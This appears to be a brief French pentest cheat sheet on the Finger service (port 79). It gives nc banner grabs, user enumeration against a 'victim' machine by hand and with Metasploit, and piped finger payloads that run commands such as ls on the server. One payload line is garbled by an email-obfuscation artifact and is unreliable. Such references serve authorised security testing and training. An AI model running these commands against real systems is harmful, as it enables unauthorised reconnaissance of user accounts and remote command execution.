Finger - 79

1. Infos:

Finger est un programme que vous pouvez utiliser pour trouver des informations sur les utilisateurs d'ordinateurs. Ces informations peuvent inclure l'emplacement du bureau et le numéro de téléphone, le temps de connexion, le temps d'inactivité, l'heure de la dernière lecture de ses mails, ainsi que les fichiers de l'utilisateur.

Port par défaut : 79
PORT   STATE SERVICE
79/tcp open  finger
2. Enumération
2.1 Récupération de la bannière et connexion
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
2.2 Enumération des utilisateurs
Utilisation du module metasploit :
use auxiliary/scanner/finger/finger_users
ou vous pouvez le faire à la main :
finger @<Machine_Victime> #Liste les utilisateurs
finger user1@<Machine_Victime> #Capture des infos sur l'utilisateur user1
2.3 Exécution de commandes
finger "|/bin/[email protected]"
finger "|/bin/ls -al /@PILOU.com"

Last modified 1yr ago